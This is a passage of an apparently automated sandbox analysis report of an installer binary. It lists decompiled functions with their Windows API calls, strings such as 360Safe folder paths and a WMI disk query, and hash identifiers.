                                                                                                                                                                        • Part of subcall function 001C87F5: __wsplitpath.LIBCMT ref: 001C8845
                                                                                                                                                                        • Part of subcall function 001C87F5: GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001C8874
                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001CEA8E
                                                                                                                                                                        • Part of subcall function 001D2080: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,001CEAA4,?,0017BD49,00100000,00000000,0000008C), ref: 001D20EE
                                                                                                                                                                      • _memset.LIBCMT ref: 001CEC0A
                                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000026,00000001,00100000,00000000,0000008C), ref: 001CEC1F
                                                                                                                                                                      • PathAppendW.SHLWAPI(?,360\360Safe), ref: 001CEC2D
                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001CEC63
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 001CED12
                                                                                                                                                                        • Part of subcall function 0016DFB0: __CxxThrowException@8.LIBCMT ref: 0016DFC2
                                                                                                                                                                      • _memset.LIBCMT ref: 001CED82
                                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000026,00000001), ref: 001CED94
                                                                                                                                                                      • PathAppendW.SHLWAPI(00000000,360Safe), ref: 001CED9F
                                                                                                                                                                        • Part of subcall function 0018F087: std::_String_base::_Xlen.LIBCPMT ref: 0018F09C
                                                                                                                                                                        • Part of subcall function 0017A8EB: _wcsnlen.LIBCMT ref: 0017A91D
                                                                                                                                                                        • Part of subcall function 001CE951: __EH_prolog3.LIBCMT ref: 001CE958
                                                                                                                                                                        • Part of subcall function 001CE334: __EH_prolog3.LIBCMT ref: 001CE33B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Path$H_prolog3_memset$AppendFolderSpecialUnothrow_t@std@@@__ehfuncinfo$??2@$CountCriticalDiskException@8FreeInitializeSectionSpaceString_base::_ThrowTickXlen__wsplitpath_wcsnlenstd::_
                                                                                                                                                                      • String ID: 360Safe$360\360Safe$:\360Safe
                                                                                                                                                                      • API String ID: 1315137449-2735685471
                                                                                                                                                                      • Opcode ID: bfdc3c51a9012998afab91dad0357324c4ef320102db5fad429610b331fa2afa
                                                                                                                                                                      • Instruction ID: 8c85a98bb3b656b1ba58c3fdd3a52fae045580e6ba48361a96d5d1eb2593279e
                                                                                                                                                                      • Opcode Fuzzy Hash: bfdc3c51a9012998afab91dad0357324c4ef320102db5fad429610b331fa2afa
                                                                                                                                                                      • Instruction Fuzzy Hash: 62E16C71D0025A9BCF15EBA4CC96EFEB7B9BF28310F10452EF415A7281DB309A45CBA5
                                                                                                                                                                      Function 001CEF0D Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 205fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001CEF2C
                                                                                                                                                                        • Part of subcall function 001EAF4F: __wcstoi64.LIBCMT ref: 001EAF2C
                                                                                                                                                                      • _memset.LIBCMT ref: 001CEF75
                                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000026,00000000,?,?,00000018), ref: 001CEF94
                                                                                                                                                                      • PathCombineW.SHLWAPI(00000000,00000000,?,360\360Safe,?,?,00000018), ref: 001CEFBB
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?,00000000,?,?,00000018), ref: 001CEFD0
                                                                                                                                                                      • PathIsDirectoryW.SHLWAPI(?), ref: 001CEFDD
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000018), ref: 001CEFEA
                                                                                                                                                                      • PathIsDirectoryW.SHLWAPI(?), ref: 001CF00A
                                                                                                                                                                      • PathIsDirectoryEmptyW.SHLWAPI(?), ref: 001CF017
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 001CF03B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Path$Directory$File$CombineCountDeleteEmptyExistsFolderH_prolog3SpecialTick__wcstoi64_memset
                                                                                                                                                                      • String ID: 360\360Safe$\360Safe
                                                                                                                                                                      • API String ID: 2943068809-3795500535
                                                                                                                                                                      • Opcode ID: 20896661774b421e33da0eeac02a6a5db6da144a8d68b3adba4988973a091f3f
                                                                                                                                                                      • Instruction ID: 9ac51d85b2704535b4094234b06bfc68f2352b9d4fbf8fcb1cec3bd75edbd633
                                                                                                                                                                      • Opcode Fuzzy Hash: 20896661774b421e33da0eeac02a6a5db6da144a8d68b3adba4988973a091f3f
                                                                                                                                                                      • Instruction Fuzzy Hash: 28715B71900159ABCF04EBA4DC56BFFB7B9AF24314F144529F516A32D2DF30AA14CBA1
                                                                                                                                                                      Function 001E29E0 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 165registrystringCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001E2A1F
                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards,00000000,00000008,?,?,?,?), ref: 001E2A3A
                                                                                                                                                                      • RegEnumKeyExA.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,0024CDA4,?,?,?,?), ref: 001E2A6C
                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,?,?,?,?), ref: 001E2A96
                                                                                                                                                                      • RegQueryValueExA.KERNEL32 ref: 001E2ACE
                                                                                                                                                                      • _memset.LIBCMT ref: 001E2AE7
                                                                                                                                                                        • Part of subcall function 001E28D0: CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000104,00000000), ref: 001E291E
                                                                                                                                                                      • lstrcmpA.KERNEL32(?,00000000), ref: 001E2B18
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 001E2B63
                                                                                                                                                                      • RegEnumKeyExA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 001E2B89
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?), ref: 001E2BA0
                                                                                                                                                                      Strings
                                                                                                                                                                      • ServiceName, xrefs: 001E2ABC
                                                                                                                                                                      • SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards, xrefs: 001E2A30
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseEnumOpen_memset$CreateFileQueryValuelstrcmp
                                                                                                                                                                      • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards$ServiceName
                                                                                                                                                                      • API String ID: 2630661138-1795789498
                                                                                                                                                                      • Opcode ID: 8fa5d204d4f89e825ec4b15cee46c40d1c98ed128658fa0d0be8afb278bee7d8
                                                                                                                                                                      • Instruction ID: 483dece26125298e5a393e180b277186e83a8e52ab4b743269ddb32c9596901c
                                                                                                                                                                      • Opcode Fuzzy Hash: 8fa5d204d4f89e825ec4b15cee46c40d1c98ed128658fa0d0be8afb278bee7d8
                                                                                                                                                                      • Instruction Fuzzy Hash: 37519E71244781AFE724CF65DC99FAFB3EDAB98704F04891CF98997180EB709909C762
                                                                                                                                                                      Function 001D42DE Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 139fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001D42FD
                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,0000000C), ref: 001D4327
                                                                                                                                                                      • _memset.LIBCMT ref: 001D438A
                                                                                                                                                                      • QueryDosDeviceW.KERNEL32(?,00000000,00000400,00000400,?,?,\\.\), ref: 001D43BA
                                                                                                                                                                      • _wcslen.LIBCMT ref: 001D43D6
                                                                                                                                                                      • __wcsnicmp.LIBCMT ref: 001D43E1
                                                                                                                                                                      • CreateFileW.KERNEL32(?,00020000,00000001,00000000,00000003,00000080,00000000,000000FF,?,?,\\.\), ref: 001D4418
                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000400,0017BD49,00000000), ref: 001D4461
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,\\.\), ref: 001D446C
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,\\.\), ref: 001D4489
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseDeviceHandle$ControlCreateDriveFileH_prolog3QueryType__wcsnicmp_memset_wcslen
                                                                                                                                                                      • String ID: \Device\Harddisk$\\.\
                                                                                                                                                                      • API String ID: 3469461504-3168084310
                                                                                                                                                                      • Opcode ID: e953c4f27a0db5b8c73eb15e8c1796d55ba22695c535b97e460a1b19a2b75760
                                                                                                                                                                      • Instruction ID: 4c7b789eb39de65dba0a45d3bdc42aef0d938be723f3187a0cb174e019e01876
                                                                                                                                                                      • Opcode Fuzzy Hash: e953c4f27a0db5b8c73eb15e8c1796d55ba22695c535b97e460a1b19a2b75760
                                                                                                                                                                      • Instruction Fuzzy Hash: 9541C0B1A00118ABDB14EFA4DC85BFE73A8FF24720F118629FA15A72C1DB305A45CB65
                                                                                                                                                                      Function 00184E4C Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 98libraryloaderthreadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00184E50
                                                                                                                                                                      • TlsGetValue.KERNEL32(00000018), ref: 00184E85
                                                                                                                                                                      • LoadLibraryW.KERNEL32(Cabinet.dll,?,74DF3170), ref: 00184EEA
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FDICreate), ref: 00184F02
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,FDICopy), ref: 00184F15
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,FDIIsCabinet), ref: 00184F28
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,FDIDestroy), ref: 00184F3B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$CurrentLibraryLoadThreadValue
                                                                                                                                                                      • String ID: Cabinet.dll$FDICopy$FDICreate$FDIDestroy$FDIIsCabinet
                                                                                                                                                                      • API String ID: 3141885424-2042144077
                                                                                                                                                                      • Opcode ID: a5c6caab537496c6853b82b358690fadbaadd92e1b6dcbe9a1520070b5d1a5a7
                                                                                                                                                                      • Instruction ID: bb633ed7938526b8a1df558243299f08c17ce67ed666440c589ac403b2f01946
                                                                                                                                                                      • Opcode Fuzzy Hash: a5c6caab537496c6853b82b358690fadbaadd92e1b6dcbe9a1520070b5d1a5a7
                                                                                                                                                                      • Instruction Fuzzy Hash: 5631C374940705AFC738AF75DC46DD2BBE4FB14701B114A6EE6AA82180DBB4A690CF90
                                                                                                                                                                      Function 5F501DB5 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 78threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 5F501DBC
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 5F501DC6
                                                                                                                                                                        • Part of subcall function 5F4EAE3C: KiUserExceptionDispatcher.NTDLL(406D1388,00000000,00000004,00001000,5F568AA8,00000018,5F51E73E,00000000), ref: 5F4EAE6F
                                                                                                                                                                      • _memset.LIBCMT ref: 5F501DF3
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F501DFB
                                                                                                                                                                        • Part of subcall function 5F4FDF99: WaitForSingleObject.KERNEL32(?,000000FF), ref: 5F4FDFA1
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F501E1A
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F501E2A
                                                                                                                                                                        • Part of subcall function 5F513FED: _memset.LIBCMT ref: 5F514020
                                                                                                                                                                        • Part of subcall function 5F513FED: wvnsprintfW.SHLWAPI(?,000003FF,?,00007148), ref: 5F51403B
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F501E57
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F501E63
                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 5F501E9E
                                                                                                                                                                      Strings
                                                                                                                                                                      • p2sp.TaskScheduler, xrefs: 5F501DC1
                                                                                                                                                                      • [TaskScheduler] type:%d, taskid:%d, cost:%dms, queue:%d., xrefs: 5F501E41
                                                                                                                                                                      • [TaskScheduler] OnTimer cost:%dms, queue:%d., xrefs: 5F501E74
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountTick$_memset$CurrentDispatcherEventExceptionH_prolog3ObjectSingleThreadUserWaitwvnsprintf
                                                                                                                                                                      • String ID: [TaskScheduler] OnTimer cost:%dms, queue:%d.$[TaskScheduler] type:%d, taskid:%d, cost:%dms, queue:%d.$p2sp.TaskScheduler
                                                                                                                                                                      • API String ID: 1333431131-1132454424
                                                                                                                                                                      • Opcode ID: 3cfe084f22275f37df1b9b5a66e93cbb7d861434eb5e706f9d4cfef2a5bf7553
                                                                                                                                                                      • Instruction ID: a3cc26cbcfd2d479c6deb8125002a61b3c4bbeb0c6a99ba890733800320b7511
                                                                                                                                                                      • Opcode Fuzzy Hash: 3cfe084f22275f37df1b9b5a66e93cbb7d861434eb5e706f9d4cfef2a5bf7553
                                                                                                                                                                      • Instruction Fuzzy Hash: 8D214BB2D112199FDB00EFF4C944AAEBBF9BF48211F10453BE115E6180D775AA158BA2
                                                                                                                                                                      Function 001D22E0 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 208comCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001D22E7
                                                                                                                                                                      • CoCreateInstance.OLE32(0022C868,00000000,00000001,0022C798,0017BD49,0000002C,001D45AD,?,?,?,?,?,?,?,?,?), ref: 001D2305
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 001D2364
                                                                                                                                                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 001D2389
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 001D2405
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 001D240A
                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 001D2460
                                                                                                                                                                      Strings
                                                                                                                                                                      • MediaType, xrefs: 001D2472
                                                                                                                                                                      • Root\Microsoft\Windows\Storage, xrefs: 001D232D
                                                                                                                                                                      • WQL, xrefs: 001D23D0
                                                                                                                                                                      • SELECT * FROM MSFT_PhysicalDisk WHERE DeviceId='%d', xrefs: 001D23A6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeString$BlanketClearCreateH_prolog3InstanceProxyVariant
                                                                                                                                                                      • String ID: MediaType$Root\Microsoft\Windows\Storage$SELECT * FROM MSFT_PhysicalDisk WHERE DeviceId='%d'$WQL
                                                                                                                                                                      • API String ID: 2951287799-4271271752
                                                                                                                                                                      • Opcode ID: d7a06cabf4db139307cf82aa7e1925fb34de884b004821c24fc7f09ea70582f8
                                                                                                                                                                      • Instruction ID: f10a96fdc4924b5c7305b7a22260ede60c12aa7465d23550548d1e7b0b68edc3
                                                                                                                                                                      • Opcode Fuzzy Hash: d7a06cabf4db139307cf82aa7e1925fb34de884b004821c24fc7f09ea70582f8
                                                                                                                                                                      • Instruction Fuzzy Hash: DF717E71A00249EFDF05DFE4C889AADBBB8FF69304F248459F915AB290C7349E45CB21
                                                                                                                                                                      Function 00169990 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 106synchronizationCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(06AC2023,?,?,?,?,?,?,?,0021CB6B,000000FF), ref: 001699D6
                                                                                                                                                                      • CreateMutexW.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,0021CB6B,000000FF), ref: 00169A0C
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0021CB6B,000000FF), ref: 00169A1F
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,?,0021CB6B,000000FF), ref: 00169A2F
                                                                                                                                                                        • Part of subcall function 00169FA0: GetProcessHeap.KERNEL32(00000000,00169A51,?,?,?,?,?,?,?,?,0021CB6B,000000FF), ref: 00169FA3
                                                                                                                                                                        • Part of subcall function 00169FA0: HeapAlloc.KERNEL32(00000000,00000000,000005C0,?,?,?,?,?,?,?,?,0021CB6B,000000FF), ref: 00169FB4
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00169A7F
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00169AA6
                                                                                                                                                                        • Part of subcall function 00169DE0: _memset.LIBCMT ref: 00169E27
                                                                                                                                                                        • Part of subcall function 00169DE0: TlsAlloc.KERNEL32 ref: 00169E53
                                                                                                                                                                        • Part of subcall function 00169DE0: __CxxThrowException@8.LIBCMT ref: 00169E73
                                                                                                                                                                      • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,0021CB6B,000000FF), ref: 00169ABE
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,0021CB6B,000000FF), ref: 00169AC9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception@8Throw$AllocHeapMutexProcess$CloseCreateCurrentErrorHandleLastObjectReleaseSingleWait_memset
                                                                                                                                                                      • String ID: %s %u$,$$1830B7BD-F7A3-4c4d-989B-C004DE465EDE
                                                                                                                                                                      • API String ID: 750356677-1808174439
                                                                                                                                                                      • Opcode ID: 6cb0e6ee19572d5ceba66c876bc71b2cfc92a99219a7cbfde281a41b964ab2ef
                                                                                                                                                                      • Instruction ID: e8abf53e4ed91571fc95dbda07c9a451e15dd7883d220af1ed17ddd847048647
                                                                                                                                                                      • Opcode Fuzzy Hash: 6cb0e6ee19572d5ceba66c876bc71b2cfc92a99219a7cbfde281a41b964ab2ef
                                                                                                                                                                      • Instruction Fuzzy Hash: D531F270904244ABDB10DFA4EC49BAE7BFCFF59714F408169E819D7281EB349A14CF90
                                                                                                                                                                      Function 001C94CC Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 146fileCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001C94EB
                                                                                                                                                                      • _wcslen.LIBCMT ref: 001C9504
                                                                                                                                                                      • _memset.LIBCMT ref: 001C9542
                                                                                                                                                                        • Part of subcall function 001BD71E: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 001BD74A
                                                                                                                                                                        • Part of subcall function 001BD71E: GetFullPathNameW.KERNEL32(?,00000104,?,00000000,0000018E,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 001BD767
                                                                                                                                                                        • Part of subcall function 001BD71E: SetLastError.KERNEL32(0000007B,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 001BD77A
                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,0000000C), ref: 001C9686
                                                                                                                                                                        • Part of subcall function 001BEE1E: __EH_prolog3.LIBCMT ref: 001BEE25
                                                                                                                                                                      • _memset.LIBCMT ref: 001C95F1
                                                                                                                                                                      • _memset.LIBCMT ref: 001C962F
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000010,?,?,?,?,?,?,?,?,0000000C), ref: 001C9656
                                                                                                                                                                      • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,?,00000010,?,?), ref: 001C966A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
